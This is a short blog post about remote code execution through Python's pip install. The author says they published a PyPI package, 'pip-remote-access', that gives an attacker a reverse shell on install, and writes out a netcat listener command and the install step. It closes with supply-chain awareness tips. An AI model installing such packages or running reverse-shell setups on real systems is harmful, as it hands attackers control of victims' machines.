RCE with pip ? Yes you read it right.
First before getting our hands dirty, lets see what is pip
Most Python developers would obviously knows what is pip.
For other developers, pip is the package installer for Python. You can use pip to install packages from the Python Package Index and other indexes. It is npm, apt, homebrew (Some other package manager you name it) for python.
How does it works
Let's assume you wanna send http request from python well you could use famous package name requests
To get requests package on your computer, you will using the command :
pip install requests That's it.
This will install the package and you can use the package can be used by importing the package.
So how the pip install works, Simple it gets the source code from the server and execute the script in your computer and install the requirements, this is how pip install works.
What if you write your own reverse shell package ?
That's what I did, I wrote a package which allows the attacker to get the reverse shell of the victim.
I didn't want to make a global reverse shell thing, so i simply wrote the script to be executed on locally on the machine.
Here's the demo video check it out: Link
The package is available: Link
- First listen on 1234 port with nc
nc -lvp 1234 - Now install the package
pip install pip-remote-access
Now the listener will get the reverse shell.
How to prevent this ?
This module is to show and create a awareness among developers, So when installing package verify that it is legal verified publisher.
PyPi.org doesn't checks the github page whether it was the appropriate right developer, It just get whatever github the developer gives and displays the stars and forks from it.
So better get into the github page of the package and check the page, this way you also get to know the code.
Install the package with binary only mode it will be much more safe.
Oldest comments (0)